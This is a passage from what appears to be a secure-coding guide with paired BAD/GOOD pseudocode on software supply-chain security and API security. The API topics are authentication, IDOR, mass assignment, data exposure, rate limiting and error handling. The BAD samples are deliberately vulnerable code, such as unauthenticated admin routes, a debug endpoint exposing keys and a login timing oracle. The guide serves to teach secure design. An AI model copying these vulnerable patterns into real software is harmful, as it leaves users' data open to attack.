tool_spec.hash: + THROW SecurityError("Build tool integrity check failed: " + tool_name) + END IF + END FOR + + // Proceed with verified tools + run_build() +END FUNCTION + +// Generate SRI hashes for your own assets +FUNCTION generate_sri_hash(file_path): + content = read_file(file_path) + hash = crypto.sha384_base64(content) + RETURN "sha384-" + hash +END FUNCTION + +FUNCTION generate_script_tag(src, file_path): + integrity = generate_sri_hash(file_path) + RETURN '' +END FUNCTION + +// Registry verification +FUNCTION verify_registry(): + // Ensure using official, signed registry + registry_config = get_registry_config() + + IF NOT registry_config.url.startswith("https://"): + THROW SecurityError("Registry must use HTTPS") + END IF + + // Verify registry certificate + IF NOT verify_certificate(registry_config.url): + THROW SecurityError("Registry certificate verification failed") + END IF + + // Check for registry signing if supported + IF registry_supports_signing(registry_config.url): + enable_signature_verification() + END IF +END FUNCTION +``` + +### 8.6 Trusting Transitive Dependencies Blindly + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Ignoring transitive dependency risks +// ======================================== + +// Your package.json has 10 direct dependencies +// But those bring in 500+ transitive dependencies +// Each is a potential attack vector + +FUNCTION show_dependency_problem(): + // You audit only direct dependencies + direct_deps = ["express", "lodash", "axios"] // 3 packages + + // Reality after npm install + all_deps = get_all_installed_packages() + print("Direct: 3, Total installed: " + all_deps.count) // 547 packages! + + // Any of those 544 transitive deps could be: + // - Abandoned and vulnerable + // - Taken over by malicious actors + // - Typosquats + // - Compromised in CI/CD +END FUNCTION + +// Event-stream incident: Dependency of dependency was compromised +// ua-parser-js incident: Popular package itself was compromised +// node-ipc incident: Maintainer added malicious code + +// ======================================== +// GOOD: Full dependency tree visibility and control +// ======================================== + +// Step 1: Analyze full dependency tree +FUNCTION analyze_dependency_tree(): + tree = package_manager.get_dependency_tree() + + analysis = { + direct: [], + transitive: [], + depth_stats: {}, + risk_assessment: [] + } + + FOR dep IN tree.flatten(): + IF dep.depth == 1: + analysis.direct.append(dep) + ELSE: + analysis.transitive.append(dep) + END IF + + // Track dependency depth + analysis.depth_stats[dep.depth] = + (analysis.depth_stats[dep.depth] OR 0) + 1 + + // Risk factors for transitive deps + risk_score = calculate_risk(dep) + IF risk_score > THRESHOLD: + analysis.risk_assessment.append({ + package: dep.name, + introduced_by: dep.parent_chain, + risk_score: risk_score, + factors: get_risk_factors(dep) + }) + END IF + END FOR + + RETURN analysis +END FUNCTION + +FUNCTION calculate_risk(dep): + risk = 0 + + // Maintainer factors + IF dep.maintainers.count == 1: + risk += 10 // Single maintainer - bus factor + END IF + + IF dep.last_update > 2_YEARS_AGO: + risk += 20 // Abandoned package + END IF + + // Security factors + IF dep.vulnerability_count > 0: + risk += dep.vulnerability_count * 15 + END IF + + IF dep.has_install_scripts: + risk += 25 // Runs code on install + END IF + + // Popularity/trust factors + IF dep.weekly_downloads < 1000: + risk += 10 // Low usage + END IF + + IF NOT dep.has_types AND dep.is_js: + risk += 5 // Less maintained indicator + END IF + + RETURN risk +END FUNCTION + +// Step 2: Detect and alert on risky transitive deps +FUNCTION monitor_transitive_deps(): + tree = get_dependency_tree() + + FOR dep IN tree.flatten(): + // Check for suspicious characteristics + IF dep.has_install_scripts: + log.warn("Package has install scripts", { + package: dep.name, + path: dep.parent_chain + }) + // Review install scripts for malicious code + scripts = get_install_scripts(dep) + FOR script IN scripts: + IF contains_suspicious_patterns(script): + THROW SecurityError("Suspicious install script in: " + dep.name) + END IF + END FOR + END IF + + // Check for native code compilation + IF dep.has_native_code: + log.warn("Package compiles native code", { + package: dep.name + }) + END IF + + // Check for network access + IF dep.makes_network_requests: + log.warn("Package makes network requests", { + package: dep.name + }) + END IF + END FOR +END FUNCTION + +// Step 3: Use dependency scanning that covers transitives +FUNCTION full_dependency_scan(): + // Scan all dependencies, not just direct + scan_result = security_scanner.scan({ + include_transitive: TRUE, + include_dev_dependencies: TRUE, + scan_depth: "all" // Not just top-level + }) + + FOR vuln IN scan_result.vulnerabilities: + // Show the path that introduces the vulnerability + log.error("Vulnerability found", { + package: vuln.package, + version: vuln.version, + severity: vuln.severity, + introduced_through: vuln.dependency_path, // e.g., "express > body-parser > qs" + recommendation: vuln.recommendation + }) + END FOR + + RETURN scan_result +END FUNCTION + +// Step 4: Consider dependency vendoring for critical deps +FUNCTION vendor_critical_dependency(package_name): + // Download specific version + content = download_verified( + get_package_url(package_name), + get_expected_hash(package_name) + ) + + // Store in vendor directory (committed to repo) + write_file("vendor/" + package_name, content) + + // Point imports to vendored version + configure_import_alias(package_name, "./vendor/" + package_name) + + // Vendored code is: + // - Not automatically updated (reduces surprise changes) + // - Under your source control (auditable) + // - Not subject to registry compromise +END FUNCTION + +// Step 5: Use SBOM (Software Bill of Materials) +FUNCTION generate_sbom(): + sbom = { + format: "CycloneDX", // or SPDX + components: [], + dependencies: [] + } + + FOR dep IN get_all_dependencies(): + sbom.components.append({ + type: "library", + name: dep.name, + version: dep.version, + purl: "pkg:npm/" + dep.name + "@" + dep.version, + hashes: [ + {algorithm: "SHA-256", content: dep.sha256} + ], + licenses: dep.licenses, + supplier: dep.publisher + }) + END FOR + + // Export for vulnerability tracking + write_file("sbom.json", json.encode(sbom)) + + // Submit to vulnerability database for ongoing monitoring + vuln_service.monitor_sbom(sbom) +END FUNCTION +``` + +--- + +## 9. API Security + +**CWE References:** CWE-284 (Improper Access Control), CWE-639 (IDOR), CWE-915 (Mass Assignment), CWE-200 (Exposure of Sensitive Information), CWE-770 (Resource Allocation Without Limits), CWE-209 (Error Message Information Exposure) +**Severity:** Critical to High | **Related:** [[API-Security]] + +> **Risk:** APIs are the primary attack surface for modern applications. Missing authentication, broken authorization (IDOR), and mass assignment vulnerabilities allow attackers to access or modify data belonging to other users, escalate privileges, and exfiltrate sensitive information. AI frequently generates API endpoints without proper security controls. + +### 9.1 Missing Authentication on Endpoints + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unprotected API endpoints +// ======================================== + +// No authentication - anyone can access +@route("/api/users") +FUNCTION get_all_users(): + RETURN database.query("SELECT * FROM users") +END FUNCTION + +// Admin functionality without auth check +@route("/api/admin/delete-user/{id}") +FUNCTION admin_delete_user(id): + database.execute("DELETE FROM users WHERE id = ?", [id]) + RETURN {status: "deleted"} +END FUNCTION + +// Sensitive data exposed without auth +@route("/api/orders/{order_id}") +FUNCTION get_order(order_id): + RETURN database.get_order(order_id) +END FUNCTION + +// "Security through obscurity" - hidden endpoint still accessible +@route("/api/internal/debug-info") +FUNCTION get_debug_info(): + RETURN { + database_connection: DB_STRING, + api_keys: LOADED_KEYS, + server_config: CONFIG + } +END FUNCTION + +// ======================================== +// GOOD: Authentication on all protected endpoints +// ======================================== + +// Middleware to enforce authentication +FUNCTION require_auth(handler): + RETURN FUNCTION wrapped(request): + token = request.headers.get("Authorization") + + IF token IS NULL: + RETURN response(401, {error: "Authentication required"}) + END IF + + user = verify_token(token) + IF user IS NULL: + RETURN response(401, {error: "Invalid or expired token"}) + END IF + + request.user = user + RETURN handler(request) + END FUNCTION +END FUNCTION + +// Middleware for admin-only routes +FUNCTION require_admin(handler): + RETURN require_auth(FUNCTION wrapped(request): + IF request.user.role != "admin": + log.security("Unauthorized admin access attempt", { + user_id: request.user.id, + endpoint: request.path + }) + RETURN response(403, {error: "Admin access required"}) + END IF + + RETURN handler(request) + END FUNCTION) +END FUNCTION + +// Protected endpoints with proper auth +@route("/api/users") +@require_admin // Only admins can list all users +FUNCTION get_all_users(request): + // Return only non-sensitive fields + users = database.query("SELECT id, name, email, created_at FROM users") + RETURN response(200, {users: users}) +END FUNCTION + +// Admin endpoint with proper protection +@route("/api/admin/delete-user/{id}") +@require_admin +FUNCTION admin_delete_user(request, id): + // Audit log before action + log.audit("User deletion", { + admin_id: request.user.id, + target_user_id: id + }) + + database.soft_delete("users", id) // Soft delete for audit trail + RETURN response(200, {status: "deleted"}) +END FUNCTION + +// Never expose internal/debug endpoints in production +IF environment != "production": + @route("/api/internal/debug-info") + @require_admin + FUNCTION get_debug_info(request): + RETURN {config: get_safe_config()} // Sanitized config only + END FUNCTION +END IF + +// Default deny - explicitly define allowed public endpoints +PUBLIC_ENDPOINTS = [ + "/api/auth/login", + "/api/auth/register", + "/api/public/status", + "/api/public/docs" +] + +FUNCTION global_auth_middleware(request): + IF request.path IN PUBLIC_ENDPOINTS: + RETURN next(request) + END IF + + // All other routes require authentication by default + RETURN require_auth(next)(request) +END FUNCTION +``` + +### 9.2 Broken Object-Level Authorization (IDOR) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: IDOR vulnerabilities - no ownership check +// ======================================== + +// Attacker changes user_id in URL to access others' data +@route("/api/users/{user_id}/profile") +@require_auth +FUNCTION get_user_profile(request, user_id): + // VULNERABLE: No check that user_id belongs to authenticated user + profile = database.get_profile(user_id) + RETURN response(200, profile) +END FUNCTION + +// Attacker can delete any order by changing order_id +@route("/api/orders/{order_id}") +@require_auth +FUNCTION delete_order(request, order_id): + // VULNERABLE: Deletes any order regardless of owner + database.delete("orders", order_id) + RETURN response(200, {status: "deleted"}) +END FUNCTION + +// Attacker accesses any document by guessing/incrementing ID +@route("/api/documents/{doc_id}") +@require_auth +FUNCTION get_document(request, doc_id): + // VULNERABLE: Sequential IDs make enumeration easy + doc = database.get_document(doc_id) + RETURN response(200, doc) +END FUNCTION + +// Horizontal privilege escalation via parameter tampering +@route("/api/transfer") +@require_auth +FUNCTION transfer_funds(request): + // VULNERABLE: from_account comes from user input + from_account = request.body.from_account + to_account = request.body.to_account + amount = request.body.amount + + execute_transfer(from_account, to_account, amount) + RETURN response(200, {status: "transferred"}) +END FUNCTION + +// ======================================== +// GOOD: Proper object-level authorization +// ======================================== + +// Always verify ownership before access +@route("/api/users/{user_id}/profile") +@require_auth +FUNCTION get_user_profile(request, user_id): + // SECURE: Verify user can only access their own profile + IF user_id != request.user.id AND request.user.role != "admin": + log.security("IDOR attempt blocked", { + authenticated_user: request.user.id, + attempted_access: user_id + }) + RETURN response(403, {error: "Access denied"}) + END IF + + profile = database.get_profile(user_id) + IF profile IS NULL: + RETURN response(404, {error: "Profile not found"}) + END IF + + RETURN response(200, profile) +END FUNCTION + +// Resource ownership verification +@route("/api/orders/{order_id}") +@require_auth +FUNCTION delete_order(request, order_id): + order = database.get_order(order_id) + + IF order IS NULL: + RETURN response(404, {error: "Order not found"}) + END IF + + // SECURE: Verify ownership before action + IF order.user_id != request.user.id: + log.security("Unauthorized order deletion attempt", { + user_id: request.user.id, + order_id: order_id, + owner_id: order.user_id + }) + RETURN response(403, {error: "Access denied"}) + END IF + + // Additional business logic check + IF order.status == "shipped": + RETURN response(400, {error: "Cannot delete shipped orders"}) + END IF + + database.delete("orders", order_id) + RETURN response(200, {status: "deleted"}) +END FUNCTION + +// Use UUIDs instead of sequential IDs to prevent enumeration +FUNCTION create_document(request): + doc_id = generate_uuid() // Not sequential, not guessable + + database.insert("documents", { + id: doc_id, + owner_id: request.user.id, + content: request.body.content + }) + + RETURN response(201, {id: doc_id}) +END FUNCTION + +// Implicit ownership from authenticated user +@route("/api/transfer") +@require_auth +FUNCTION transfer_funds(request): + // SECURE: from_account MUST belong to authenticated user + from_account = database.get_account(request.body.from_account) + + IF from_account IS NULL OR from_account.owner_id != request.user.id: + RETURN response(403, {error: "Invalid source account"}) + END IF + + to_account = database.get_account(request.body.to_account) + IF to_account IS NULL: + RETURN response(404, {error: "Destination account not found"}) + END IF + + amount = request.body.amount + IF amount <= 0 OR amount > from_account.balance: + RETURN response(400, {error: "Invalid amount"}) + END IF + + execute_transfer(from_account.id, to_account.id, amount) + + log.audit("Funds transfer", { + user_id: request.user.id, + from: from_account.id, + to: to_account.id, + amount: amount + }) + + RETURN response(200, {status: "transferred"}) +END FUNCTION + +// Reusable authorization decorator +FUNCTION authorize_resource(resource_type, id_param): + RETURN FUNCTION decorator(handler): + RETURN FUNCTION wrapped(request): + resource_id = request.params[id_param] + resource = database.get(resource_type, resource_id) + + IF resource IS NULL: + RETURN response(404, {error: resource_type + " not found"}) + END IF + + IF NOT can_access(request.user, resource): + log.security("Authorization failed", { + user_id: request.user.id, + resource_type: resource_type, + resource_id: resource_id + }) + RETURN response(403, {error: "Access denied"}) + END IF + + request.resource = resource + RETURN handler(request) + END FUNCTION + END FUNCTION +END FUNCTION + +// Usage +@route("/api/documents/{doc_id}") +@require_auth +@authorize_resource("documents", "doc_id") +FUNCTION get_document(request, doc_id): + RETURN response(200, request.resource) // Already verified +END FUNCTION +``` + +### 9.3 Mass Assignment Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Mass assignment - accepting all user input +// ======================================== + +// Attacker sends: {"name": "John", "role": "admin", "balance": 999999} +@route("/api/users/update") +@require_auth +FUNCTION update_user(request): + // VULNERABLE: Directly assigns all request body fields + user = database.get_user(request.user.id) + + FOR field, value IN request.body: + user[field] = value // Attacker can set ANY field! + END FOR + + database.save(user) + RETURN response(200, user) +END FUNCTION + +// ORM auto-mapping vulnerability +@route("/api/users") +@require_auth +FUNCTION create_user(request): + // VULNERABLE: ORM creates user from all request fields + user = User.create(request.body) // Includes role, isAdmin, etc.! + RETURN response(201, user) +END FUNCTION + +// Nested object mass assignment +@route("/api/orders") +@require_auth +FUNCTION create_order(request): + // VULNERABLE: Nested payment object can set price + order = Order.create({ + user_id: request.user.id, + items: request.body.items, + payment: request.body.payment // Attacker sets payment.amount = 0 + }) + RETURN response(201, order) +END FUNCTION + +// ======================================== +// GOOD: Explicit field allowlisting +// ======================================== + +// Define what fields can be updated +CONSTANT USER_UPDATABLE_FIELDS = ["name", "email", "phone", "address"] +CONSTANT USER_ADMIN_FIELDS = ["role", "status", "verified"] + +@route("/api/users/update") +@require_auth +FUNCTION update_user_secure(request): + user = database.get_user(request.user.id) + + // SECURE: Only update explicitly allowed fields + FOR field IN USER_UPDATABLE_FIELDS: + IF field IN request.body: + user[field] = sanitize(request.body[field]) + END IF + END FOR + + database.save(user) + + // Return only safe fields + RETURN response(200, user.to_public_dict()) +END FUNCTION + +// Admin with different field permissions +@route("/api/admin/users/{user_id}") +@require_admin +FUNCTION admin_update_user(request, user_id): + user = database.get_user(user_id) + + // Admins can update more fields, but still allowlisted + allowed_fields = USER_UPDATABLE_FIELDS + USER_ADMIN_FIELDS + + FOR field IN allowed_fields: + IF field IN request.body: + user[field] = request.body[field] + END IF + END FOR + + log.audit("Admin user update", { + admin_id: request.user.id, + user_id: user_id, + fields_changed: request.body.keys() + }) + + database.save(user) + RETURN response(200, user) +END FUNCTION + +// Use DTOs (Data Transfer Objects) for input +CLASS UserUpdateDTO: + name: String (max_length=100) + email: String (email_format, max_length=255) + phone: String (phone_format, optional) + address: String (max_length=500, optional) + + FUNCTION from_request(body): + dto = UserUpdateDTO() + dto.name = validate_string(body.name, max_length=100) + dto.email = validate_email(body.email) + dto.phone = validate_phone(body.phone) IF body.phone ELSE NULL + dto.address = validate_string(body.address, max_length=500) IF body.address ELSE NULL + RETURN dto + END FUNCTION +END CLASS + +@route("/api/users/update") +@require_auth +FUNCTION update_user_dto(request): + TRY: + dto = UserUpdateDTO.from_request(request.body) + CATCH ValidationError as e: + RETURN response(400, {error: e.message}) + END TRY + + user = database.get_user(request.user.id) + user.apply_dto(dto) // Only applies DTO fields + database.save(user) + + RETURN response(200, user.to_public_dict()) +END FUNCTION + +// Nested objects with strict validation +CLASS OrderCreateDTO: + items: Array of OrderItemDTO + shipping_address_id: UUID + // payment calculated server-side, NOT from request + + FUNCTION from_request(body, user): + dto = OrderCreateDTO() + dto.items = [OrderItemDTO.from_request(item) FOR item IN body.items] + + // Verify address belongs to user + address = database.get_address(body.shipping_address_id) + IF address IS NULL OR address.user_id != user.id: + THROW ValidationError("Invalid shipping address") + END IF + dto.shipping_address_id = address.id + + RETURN dto + END FUNCTION +END CLASS + +@route("/api/orders") +@require_auth +FUNCTION create_order_secure(request): + dto = OrderCreateDTO.from_request(request.body, request.user) + + // Calculate payment server-side from validated items + total = 0 + FOR item IN dto.items: + product = database.get_product(item.product_id) + total += product.price * item.quantity // Price from DB, not request! + END FOR + + order = Order.create({ + user_id: request.user.id, + items: dto.items, + shipping_address_id: dto.shipping_address_id, + total: total // Server-calculated + }) + + RETURN response(201, order.to_dict()) +END FUNCTION +``` + +### 9.4 Excessive Data Exposure + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Exposing too much data in API responses +// ======================================== + +// Returns entire user object including sensitive fields +@route("/api/users/{user_id}") +@require_auth +FUNCTION get_user(request, user_id): + user = database.get_user(user_id) + RETURN response(200, user) // Includes password_hash, SSN, internal_notes! +END FUNCTION + +// Returns all columns from database +@route("/api/orders") +@require_auth +FUNCTION get_orders(request): + orders = database.query("SELECT * FROM orders WHERE user_id = ?", + [request.user.id]) + RETURN response(200, orders) // Includes internal pricing, profit margins +END FUNCTION + +// Exposes related entities without filtering +@route("/api/products/{id}") +FUNCTION get_product(request, id): + product = database.get_product_with_relations(id) + RETURN response(200, product) // Includes supplier.contact, supplier.cost +END FUNCTION + +// Debug info in production responses +@route("/api/search") +FUNCTION search(request): + results = database.search(request.query.q) + RETURN response(200, { + results: results, + query_time_ms: results.execution_time, + sql_query: results.raw_query, // Exposes DB schema! + server_id: SERVER_ID + }) +END FUNCTION + +// ======================================== +// GOOD: Response filtering and DTOs +// ======================================== + +// Define response schemas +CLASS UserPublicResponse: + id: UUID + name: String + avatar_url: String + created_at: DateTime + + FUNCTION from_user(user): + RETURN { + id: user.id, + name: user.name, + avatar_url: user.avatar_url, + created_at: user.created_at + } + END FUNCTION +END CLASS + +CLASS UserPrivateResponse: // For the user themselves + id: UUID + name: String + email: String + phone: String (masked) + avatar_url: String + created_at: DateTime + preferences: Object + + FUNCTION from_user(user): + RETURN { + id: user.id, + name: user.name, + email: user.email, + phone: mask_phone(user.phone), // Show only last 4 digits + avatar_url: user.avatar_url, + created_at: user.created_at, + preferences: user.preferences + } + END FUNCTION +END CLASS + +@route("/api/users/{user_id}") +@require_auth +FUNCTION get_user_filtered(request, user_id): + user = database.get_user(user_id) + + IF user IS NULL: + RETURN response(404, {error: "User not found"}) + END IF + + // Different responses based on who's requesting + IF user_id == request.user.id: + RETURN response(200, UserPrivateResponse.from_user(user)) + ELSE: + RETURN response(200, UserPublicResponse.from_user(user)) + END IF +END FUNCTION + +// Explicit field selection in queries +@route("/api/orders") +@require_auth +FUNCTION get_orders_filtered(request): + // Only select fields needed for the response + orders = database.query( + "SELECT id, status, total, created_at, shipping_address " + + "FROM orders WHERE user_id = ?", + [request.user.id] + ) + + RETURN response(200, { + orders: orders.map(order => OrderResponse.from_order(order)) + }) +END FUNCTION + +// Filter nested relations +CLASS ProductResponse: + id: UUID + name: String + description: String + price: Decimal + category: String + images: Array + average_rating: Float + // Excludes: cost, supplier, profit_margin, internal_notes + + FUNCTION from_product(product): + RETURN { + id: product.id, + name: product.name, + description: product.description, + price: product.price, + category: product.category.name, // Only category name + images: product.images.map(i => i.url), // Only URLs + average_rating: product.average_rating + } + END FUNCTION +END CLASS + +// GraphQL field filtering +FUNCTION resolve_user(parent, args, context): + user = database.get_user(args.id) + + // Check each requested field + allowed_fields = get_allowed_fields(context.user, user) + + result = {} + FOR field IN context.requested_fields: + IF field IN allowed_fields: + result[field] = user[field] + ELSE: + result[field] = NULL // Or omit entirely + END IF + END FOR + + RETURN result +END FUNCTION + +// Never expose internal debugging info +@route("/api/search") +FUNCTION search_safe(request): + results = database.search(request.query.q) + + RETURN response(200, { + results: results.items.map(item => item.to_public_dict()), + total: results.total_count, + page: results.page + // No query_time_ms, sql_query, or server_id + }) +END FUNCTION + +// Pagination to prevent data dumping +@route("/api/users") +@require_admin +FUNCTION list_users(request): + page = INT(request.query.page, default=1) + per_page = MIN(INT(request.query.per_page, default=20), 100) // Max 100 + + users = database.paginate("users", page, per_page) + + RETURN response(200, { + users: users.map(u => UserAdminResponse.from_user(u)), + pagination: { + page: page, + per_page: per_page, + total_pages: users.total_pages, + total_count: users.total_count + } + }) +END FUNCTION +``` + +### 9.5 Missing Rate Limiting + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No rate limiting +// ======================================== + +// Login endpoint vulnerable to brute force +@route("/api/auth/login") +FUNCTION login(request): + user = database.find_by_email(request.body.email) + + IF user IS NULL OR NOT verify_password(request.body.password, user.password_hash): + RETURN response(401, {error: "Invalid credentials"}) + END IF + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// Expensive operation with no limits +@route("/api/reports/generate") +@require_auth +FUNCTION generate_report(request): + // CPU-intensive, no limits - easy DoS + report = generate_complex_report(request.body.params) + RETURN response(200, report) +END FUNCTION + +// SMS/email sending without limits +@route("/api/auth/send-verification") +FUNCTION send_verification(request): + // Attacker can spam any phone/email + send_sms(request.body.phone, generate_code()) + RETURN response(200, {status: "sent"}) +END FUNCTION + +// ======================================== +// GOOD: Comprehensive rate limiting +// ======================================== + +// Rate limiter configuration +rate_limits = { + // Per IP limits + "ip:global": {limit: 1000, window: "1 hour"}, + "ip:auth": {limit: 10, window: "15 minutes"}, + "ip:sensitive": {limit: 5, window: "1 minute"}, + + // Per user limits + "user:global": {limit: 5000, window: "1 hour"}, + "user:write": {limit: 100, window: "1 hour"}, + + // Per resource limits + "resource:reports": {limit: 10, window: "1 hour"} +} + +FUNCTION rate_limit(key_type, key_suffix=""): + RETURN FUNCTION decorator(handler): + RETURN FUNCTION wrapped(request): + config = rate_limits[key_type] + + // Build rate limit key + IF key_type.starts_with("ip:"): + key = key_type + ":" + request.client_ip + key_suffix + ELSE IF key_type.starts_with("user:"): + IF request.user IS NULL: + RETURN response(401, {error: "Authentication required"}) + END IF + key = key_type + ":" + request.user.id + key_suffix + ELSE: + key = key_type + key_suffix + END IF + + // Check rate limit + current = redis.incr(key) + IF current == 1: + redis.expire(key, config.window) + END IF + + IF current > config.limit: + retry_after = redis.ttl(key) + log.security("Rate limit exceeded", { + key: key, + ip: request.client_ip, + user_id: request.user.id IF request.user ELSE NULL + }) + RETURN response(429, { + error: "Too many requests", + retry_after: retry_after + }, headers={"Retry-After": retry_after}) + END IF + + // Add rate limit headers + response = handler(request) + response.headers["X-RateLimit-Limit"] = config.limit + response.headers["X-RateLimit-Remaining"] = config.limit - current + response.headers["X-RateLimit-Reset"] = redis.ttl(key) + + RETURN response + END FUNCTION + END FUNCTION +END FUNCTION + +// Login with rate limiting +@route("/api/auth/login") +@rate_limit("ip:auth") +FUNCTION login_protected(request): + email = request.body.email + + // Additional per-account rate limiting + account_key = "auth:account:" + sha256(email) + attempts = redis.incr(account_key) + IF attempts == 1: + redis.expire(account_key, 3600) // 1 hour + END IF + + IF attempts > 5: + // Lock account temporarily + log.security("Account locked due to failed attempts", {email: email}) + RETURN response(423, { + error: "Account temporarily locked", + retry_after: redis.ttl(account_key) + }) + END IF + + user = database.find_by_email(email) + + IF user IS NULL OR NOT verify_password(request.body.password, user.password_hash): + // Don't reset counter on failure + RETURN response(401, {error: "Invalid credentials"}) + END IF + + // Reset counter on successful login + redis.delete(account_key) + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// Expensive operations with strict limits +@route("/api/reports/generate") +@require_auth +@rate_limit("user:write") +@rate_limit("resource:reports") +FUNCTION generate_report_limited(request): + // Queue for async processing if over capacity + active_reports = get_active_report_count(request.user.id) + + IF active_reports > 3: + RETURN response(429, {error: "Too many reports in progress"}) + END IF + + job_id = queue_report_generation(request.user.id, request.body.params) + + RETURN response(202, { + job_id: job_id, + status: "queued", + estimated_time: estimate_completion_time() + }) +END FUNCTION + +// SMS/email with phone/email-specific limits +@route("/api/auth/send-verification") +@rate_limit("ip:sensitive") +FUNCTION send_verification_limited(request): + phone = request.body.phone + + // Rate limit per phone number + phone_key = "verify:phone:" + sha256(phone) + count = redis.incr(phone_key) + IF count == 1: + redis.expire(phone_key, 3600) // 1 hour + END IF + + IF count > 3: + RETURN response(429, { + error: "Too many verification requests for this number" + }) + END IF + + // Verify phone format before sending + IF NOT is_valid_phone(phone): + RETURN response(400, {error: "Invalid phone number"}) + END IF + + code = generate_secure_code() + redis.setex("verify:code:" + sha256(phone), 600, code) // 10 min expiry + + send_sms(phone, "Your code: " + code) + + RETURN response(200, {status: "sent"}) +END FUNCTION + +// Sliding window rate limiter for more precise control +FUNCTION sliding_window_limit(key, limit, window_seconds): + now = current_timestamp() + window_start = now - window_seconds + + // Remove old entries + redis.zremrangebyscore(key, "-inf", window_start) + + // Count current window + count = redis.zcard(key) + + IF count >= limit: + RETURN FALSE + END IF + + // Add current request + redis.zadd(key, now, generate_uuid()) + redis.expire(key, window_seconds) + + RETURN TRUE +END FUNCTION +``` + +### 9.6 Improper Error Handling in APIs + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Error messages revealing internal details +// ======================================== + +// Exposes database structure +@route("/api/users/{id}") +FUNCTION get_user_bad_errors(request, id): + TRY: + user = database.get_user(id) + RETURN response(200, user) + CATCH DatabaseError as e: + // VULNERABLE: Exposes table names, query structure + RETURN response(500, { + error: "Database error", + query: "SELECT * FROM users WHERE id = " + id, + message: e.message, // "Column 'password_hash' cannot be null" + stack_trace: e.stack_trace + }) + END TRY +END FUNCTION + +// Reveals filesystem paths +@route("/api/files/{file_id}") +FUNCTION get_file_bad(request, file_id): + TRY: + content = read_file("/var/app/uploads/" + file_id) + RETURN response(200, content) + CATCH FileNotFoundError as e: + // VULNERABLE: Exposes server filesystem structure + RETURN response(404, { + error: "File not found: /var/app/uploads/" + file_id, + available_files: list_directory("/var/app/uploads/") + }) + END TRY +END FUNCTION + +// Authentication timing oracle +@route("/api/auth/login") +FUNCTION login_timing_oracle(request): + user = database.find_by_email(request.body.email) + + IF user IS NULL: + // Returns immediately - attacker knows email doesn't exist + RETURN response(401, {error: "User not found"}) + END IF + + IF NOT verify_password(request.body.password, user.password_hash): + // Takes longer due to password verification + RETURN response(401, {error: "Invalid password"}) + END IF + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// Inconsistent error format breaks security tools +@route("/api/orders") +FUNCTION create_order_inconsistent(request): + IF NOT valid_items(request.body.items): + RETURN response(400, "Invalid items") // String + END IF + + IF NOT has_stock(request.body.items): + RETURN response(400, {msg: "Out of stock"}) // Different key + END IF + + IF payment_failed: + RETURN {status: "error", reason: "Payment failed"} // No status code + END IF +END FUNCTION + +// ======================================== +// GOOD: Secure, consistent error handling +// ======================================== + +// Standardized error response class +CLASS APIError: + status: Integer + code: String // Machine-readable error code + message: String // User-friendly message + request_id: String // For support/debugging + + FUNCTION to_response(): + RETURN response(this.status, { + error: { + code: this.code, + message: this.message, + request_id: this.request_id + } + }) + END FUNCTION +END CLASS + +// Error codes mapping (documented in API docs) +ERROR_CODES = { + "AUTH_REQUIRED": {status: 401, message: "Authentication required"}, + "AUTH_INVALID": {status: 401, message: "Invalid credentials"}, + "FORBIDDEN": {status: 403, message: "Access denied"}, + "NOT_FOUND": {status: 404, message: "Resource not found"}, + "VALIDATION_ERROR": {status: 400, message: "Invalid request data"}, + "RATE_LIMITED": {status: 429, message: "Too many requests"}, + "INTERNAL_ERROR": {status: 500, message: "An unexpected error occurred"} +} + +// Global error handler +FUNCTION global_error_handler(error, request): + request_id = generate_request_id() + + // Log full error details internally + log.error("Request failed", { + request_id: request_id, + path: request.path, + method: request.method, + user_id: request.user.id IF request.user ELSE NULL, + error_type: error.type, + error_message: error.message, + stack_trace: error.stack_trace, + request_body: redact_sensitive(request.body) + }) + + // Return sanitized error to client + IF error IS APIError: + error.request_id = request_id + RETURN error.to_response() + ELSE IF error IS ValidationError: + RETURN APIError( + status=400, + code="VALIDATION_ERROR", + message=error.user_message, // Safe message + request_id=request_id + ).to_response() + ELSE: + // Generic error - never expose internal details + RETURN APIError( + status=500, + code="INTERNAL_ERROR", + message="An unexpected error occurred. Reference: " + request_id, + request_id=request_id + ).to_response() + END IF +END FUNCTION + +// Secure authentication with constant-time comparison +@route("/api/auth/login") +FUNCTION login_secure_errors(request): + email = request.body.email + password = request.body.password + + user = database.find_by_email(email) + + // Always perform password check to prevent timing oracle + IF user IS NOT NULL: + password_valid = constant_time_compare( + hash_password(password, user.salt), + user.password_hash + ) + ELSE: + // Fake password check to maintain consistent timing + constant_time_compare( + hash_password(password, generate_fake_salt()), + DUMMY_HASH + ) + password_valid = FALSE + END IF + + IF NOT password_valid: + // Same error message whether user exists or not + log.security("Failed login attempt", { + email_hash: sha256(email), // Don't log raw email + ip: request.client_ip + }) + RETURN APIError( + status=401, + code="AUTH_INVALID", + message="Invalid email or password" + ).to_response() + END IF + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// File operations without path disclosure +@route("/api/files/{file_id}") +FUNCTION get_file_secure(request, file_id): + // Validate file_id format (UUID only) + IF NOT is_valid_uuid(file_id): + RETURN APIError( + status=400, + code="VALIDATION_ERROR", + message="Invalid file ID format" + ).to_response() + END IF + + // Look up file in database (not filesystem path) + file_record = database.get_file(file_id) + + IF file_record IS NULL: + RETURN APIError( + status=404, + code="NOT_FOUND", + message="File not found" + ).to_response() + END IF + + // Check ownership + IF file_record.owner_id != request.user.id: + // Same error as not found - don't reveal existence + RETURN APIError( + status=404, + code="NOT_FOUND", + message="File not found" + ).to_response() + END IF + + TRY: + content = storage.read(file_record.storage_key) + RETURN response(200, content, headers={ + "Content-Type": file_record.mime_type + }) + CATCH StorageError as e: + log.error("File read failed", { + file_id: file_id, + storage_key: file_record.storage_key, + error: e.message + }) + RETURN APIError( + status=500, + code="INTERNAL_ERROR", + message="Unable to retrieve file" + ).to_response() + END TRY +END FUNCTION + +// Validation errors without revealing schema +FUNCTION validate_request(schema, data): + errors = [] + + FOR field, rules IN schema: + IF field NOT IN data AND rules.required: + 